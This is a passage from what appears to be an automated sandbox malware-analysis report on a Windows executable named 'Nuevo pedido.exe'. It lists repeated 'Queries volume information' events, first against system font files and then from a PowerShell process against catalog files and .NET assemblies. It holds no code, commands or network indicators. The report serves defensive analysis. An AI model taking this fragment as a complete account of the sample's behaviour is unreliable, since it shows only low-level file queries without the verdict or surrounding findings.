                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
